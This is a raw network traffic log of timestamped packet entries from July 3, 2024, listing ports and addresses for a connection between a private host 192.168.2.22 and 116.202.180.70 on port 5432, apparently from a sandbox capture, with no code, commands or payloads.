Jul 3, 2024 02:22:32.434516907 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.460999966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461030006 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461040974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461066008 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461076021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461078882 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461086988 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461097956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461108923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461118937 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461143017 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461268902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461313009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461354971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461366892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461376905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461386919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461396933 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461405039 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461407900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461414099 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461430073 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461441040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461520910 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461530924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461564064 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461630106 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461662054 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461663961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461680889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461690903 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461699963 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461702108 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461714029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461714029 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461729050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461745977 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461781025 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461801052 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461811066 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461813927 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461836100 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461838007 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461844921 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461847067 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461867094 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461875916 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461875916 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461888075 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461899996 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461910009 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.461920023 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461935043 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.461955070 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.478262901 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478272915 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478281975 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478291035 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478300095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478307962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478316069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.478318930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478329897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.478347063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.478430033 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478439093 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478447914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478457928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478467941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478475094 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.478477955 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478487968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.478490114 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.478504896 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.478513002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490567923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490576982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490588903 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490598917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490609884 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490612984 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490619898 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490622997 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490626097 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490647078 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490650892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490654945 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490660906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490669012 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490678072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490683079 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490696907 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490705967 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490716934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490725040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490751028 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490812063 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490822077 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.490847111 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.490847111 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500099897 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500114918 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500124931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500134945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500144958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500171900 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500185013 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500209093 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500220060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500228882 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500238895 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500250101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500258923 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500258923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500269890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500278950 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500279903 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500303030 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500318050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500330925 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500341892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500351906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500363111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500368118 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500372887 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500381947 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500382900 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500394106 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.500403881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500428915 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.500669003 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.506916046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.506923914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.506936073 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.506947041 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.506957054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.506963968 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.506968021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.506978035 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.506988049 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.506989956 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.507014036 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.507025003 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519279957 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519340038 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519345045 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519376993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519387007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519387007 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519412041 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519418001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519429922 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519440889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519449949 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519459963 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519470930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519527912 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519536972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519537926 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519548893 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519556999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519572973 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519577026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519586086 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519586086 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519597054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519607067 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519608974 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519623995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519637108 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519644976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519654036 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519663095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519681931 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519686937 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519690037 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519695997 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519721985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519731998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519803047 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519812107 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519823074 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519845009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519851923 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519869089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519877911 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519887924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519898891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.519906998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519922018 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.519927979 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.528686047 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.529077053 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552728891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552798986 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552820921 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552830935 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552839994 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552849054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552859068 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552862883 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552869081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552876949 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552891016 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552891016 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552905083 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552922964 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552937984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552948952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552958965 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552968979 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552978992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.552983046 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552993059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.552994013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553009987 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553006887 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553020000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553026915 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553030014 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553040028 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553042889 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553049088 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553057909 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553066015 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553066015 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553076029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553078890 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553092003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553101063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553102970 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553109884 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553112984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553122997 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553122997 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553133011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553133965 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553138018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.553145885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553159952 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553173065 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.553380966 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.568978071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569044113 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569080114 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569089890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569101095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569109917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569123030 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569123030 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569133043 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569135904 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569143057 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569153070 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569159031 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569168091 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569169998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569184065 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569185019 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569195032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569199085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569205046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569211006 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569216013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.569219112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569236040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.569242954 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581253052 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581286907 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581294060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581312895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581324100 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581497908 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581506968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581516981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581527948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581538916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581540108 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581547022 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581548929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581557989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581567049 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581569910 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581577063 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581583023 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581588030 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581598043 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581602097 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581608057 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.581610918 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581624985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.581638098 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590611935 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590670109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590675116 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590679884 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590688944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590698004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590709925 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590713978 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590724945 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590725899 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590740919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590747118 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590755939 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590774059 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590789080 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590796947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590797901 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590806961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590809107 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590816975 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590822935 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590842009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590847015 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590907097 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590915918 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590933084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590941906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590948105 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590951920 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.590964079 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590975046 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.590993881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.591008902 CEST	5432	49169	116.202.180.70	192.168.2.22
